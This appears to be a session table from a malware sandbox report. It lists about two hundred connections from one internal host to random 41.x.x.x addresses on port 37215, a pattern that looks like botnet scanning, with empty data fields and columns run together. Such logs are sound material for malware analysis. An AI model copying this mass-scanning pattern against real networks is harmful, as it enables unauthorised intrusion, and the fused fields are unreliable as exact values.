                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27997192.168.2.155205241.87.89.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27998192.168.2.154598041.36.105.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            27999192.168.2.155888641.31.80.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28000192.168.2.154027641.31.237.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28001192.168.2.156043841.175.89.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28002192.168.2.154123241.200.171.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28003192.168.2.154211841.128.85.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28004192.168.2.154335441.122.60.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28005192.168.2.153502241.6.27.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28006192.168.2.153324841.66.155.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28007192.168.2.154996841.237.17.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28008192.168.2.153380241.82.150.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28009192.168.2.153825041.42.230.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28010192.168.2.155871841.34.106.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28011192.168.2.154297041.67.43.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28012192.168.2.154737641.100.122.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28013192.168.2.153415841.102.58.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28014192.168.2.154504441.39.72.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28015192.168.2.154995241.92.131.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28016192.168.2.154096241.227.62.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28017192.168.2.156091841.98.95.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28018192.168.2.154153241.16.103.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28019192.168.2.154764441.147.238.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28020192.168.2.154152041.72.34.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28021192.168.2.156081041.54.21.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28022192.168.2.154164041.52.99.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28023192.168.2.155089841.136.74.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28024192.168.2.153376041.56.83.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28025192.168.2.155863841.206.133.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28026192.168.2.155412841.8.139.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28027192.168.2.154565641.201.41.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28028192.168.2.155722041.124.225.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28029192.168.2.155394441.185.188.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28030192.168.2.155032441.172.220.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28031192.168.2.153635441.43.72.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28032192.168.2.154802841.64.153.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28033192.168.2.153277641.162.73.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28034192.168.2.153309041.201.137.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28035192.168.2.155699841.38.246.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28036192.168.2.153919641.178.156.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28037192.168.2.155373841.254.248.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28038192.168.2.153989041.85.253.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28039192.168.2.155289841.17.140.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28040192.168.2.154158841.18.78.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28041192.168.2.155609841.243.232.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28042192.168.2.154337641.96.160.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28043192.168.2.154457041.241.163.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28044192.168.2.155747841.56.149.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28045192.168.2.153372441.201.247.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28046192.168.2.153874641.210.253.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28047192.168.2.153637041.211.64.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28048192.168.2.154999441.0.141.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28049192.168.2.155694241.85.102.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28050192.168.2.154338841.242.243.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28051192.168.2.154570441.254.230.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28052192.168.2.155840441.71.39.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28053192.168.2.154213641.208.173.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28054192.168.2.154548041.19.189.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28055192.168.2.155559441.218.27.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28056192.168.2.155275241.197.235.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28057192.168.2.154482641.123.4.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28058192.168.2.154970241.50.253.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28059192.168.2.155744841.143.60.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28060192.168.2.153735041.131.19.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28061192.168.2.156054041.15.249.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28062192.168.2.153764041.92.54.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28063192.168.2.154275041.40.205.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28064192.168.2.155115841.29.208.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28065192.168.2.154406041.136.67.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28066192.168.2.155022041.101.123.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28067192.168.2.153832841.29.116.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28068192.168.2.155903241.23.37.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28069192.168.2.154591641.198.65.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28070192.168.2.154217041.56.205.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28071192.168.2.155260241.246.128.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28072192.168.2.154274641.72.129.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28073192.168.2.156032041.179.22.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28074192.168.2.155216841.2.59.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28075192.168.2.155061241.71.233.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28076192.168.2.156016841.81.233.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28077192.168.2.153787241.68.20.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28078192.168.2.153881041.251.59.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28079192.168.2.153665441.52.186.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28080192.168.2.155203241.231.57.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28081192.168.2.153957041.5.201.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28082192.168.2.154950641.222.231.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28083192.168.2.155113641.247.156.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28084192.168.2.154895241.16.45.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28085192.168.2.153445241.176.123.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28086192.168.2.155843041.144.110.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28087192.168.2.155376041.88.44.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28088192.168.2.154245641.92.26.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28089192.168.2.155066641.197.168.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28090192.168.2.155647641.123.218.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28091192.168.2.155676641.177.144.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28092192.168.2.155902641.188.16.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28093192.168.2.154899441.122.189.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28094192.168.2.155990241.69.64.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28095192.168.2.154445841.57.143.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28096192.168.2.153629841.225.227.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28097192.168.2.154818641.125.45.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28098192.168.2.154596441.243.49.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28099192.168.2.154776041.182.25.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28100192.168.2.155388041.97.60.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28101192.168.2.154861041.24.142.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28102192.168.2.154401441.182.128.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28103192.168.2.153602241.97.146.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28104192.168.2.155803041.52.56.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28105192.168.2.155824241.242.113.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28106192.168.2.154031241.103.164.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28107192.168.2.155968841.236.141.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28108192.168.2.153731241.237.178.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28109192.168.2.154047441.57.221.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28110192.168.2.154211841.189.142.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28111192.168.2.153627641.131.205.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28112192.168.2.154715041.160.11.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28113192.168.2.154017241.189.141.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28114192.168.2.156093441.69.164.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28115192.168.2.153506841.130.32.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28116192.168.2.154328641.162.100.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28117192.168.2.154421841.109.162.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28118192.168.2.154457441.240.56.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28119192.168.2.155610241.79.207.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28120192.168.2.155565041.222.23.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28121192.168.2.155407041.19.154.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28122192.168.2.155322441.253.9.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28123192.168.2.155779841.105.53.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28124192.168.2.154545041.49.60.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28125192.168.2.155530441.245.81.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28126192.168.2.155137041.170.111.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28127192.168.2.155640241.224.212.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28128192.168.2.153333841.12.207.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28129192.168.2.155099441.4.170.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28130192.168.2.155270041.134.123.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28131192.168.2.153765441.137.27.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28132192.168.2.154428641.80.231.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28133192.168.2.154333841.14.148.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28134192.168.2.154367441.39.254.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28135192.168.2.153280241.194.202.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28136192.168.2.154795641.1.186.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28137192.168.2.155656041.199.227.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28138192.168.2.153607641.29.122.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28139192.168.2.154868841.156.182.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28140192.168.2.155797641.232.23.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28141192.168.2.154088841.111.62.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28142192.168.2.154533641.89.185.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28143192.168.2.153337641.11.175.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28144192.168.2.156024641.20.106.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28145192.168.2.154979241.50.206.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28146192.168.2.155355641.149.71.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28147192.168.2.154305241.72.128.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28148192.168.2.155973641.198.109.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28149192.168.2.154640041.24.117.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28150192.168.2.155229841.13.247.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28151192.168.2.153476841.108.50.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28152192.168.2.155338641.121.198.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28153192.168.2.155615041.178.73.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28154192.168.2.154059841.227.249.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28155192.168.2.154560441.38.147.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28156192.168.2.153472241.191.204.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28157192.168.2.153978041.235.14.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28158192.168.2.155789441.42.49.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28159192.168.2.154183241.195.198.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28160192.168.2.153290641.49.75.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28161192.168.2.154238641.3.183.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28162192.168.2.154656441.95.119.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28163192.168.2.153831241.178.75.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28164192.168.2.154812841.63.41.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28165192.168.2.153454841.235.152.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28166192.168.2.153576241.144.133.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28167192.168.2.154321641.110.86.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28168192.168.2.154644441.43.117.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28169192.168.2.153836241.31.249.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28170192.168.2.154808841.141.38.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28171192.168.2.153357041.2.23.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28172192.168.2.153419841.228.150.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28173192.168.2.153820241.156.109.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28174192.168.2.153771641.65.171.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28175192.168.2.153689441.136.248.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28176192.168.2.155580241.25.148.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28177192.168.2.154766641.222.10.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28178192.168.2.154087841.113.78.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28179192.168.2.154541841.75.121.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28180192.168.2.155517041.42.128.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28181192.168.2.154810441.56.197.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28182192.168.2.155332441.73.47.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28183192.168.2.154810241.171.241.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28184192.168.2.153735041.126.139.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28185192.168.2.154691041.254.193.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28186192.168.2.155304641.136.232.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28187192.168.2.154386841.37.33.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28188192.168.2.155726441.17.226.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28189192.168.2.154808841.223.21.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28190192.168.2.155306641.121.55.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28191192.168.2.155002041.106.35.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28192192.168.2.154536841.229.29.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28193192.168.2.156028041.32.3.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28194192.168.2.155840641.220.12.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28195192.168.2.154081241.99.193.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28196192.168.2.155049441.26.13.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28197192.168.2.154442041.50.224.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28198192.168.2.153924241.30.58.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            28199192.168.2.153933041.187.67.24137215
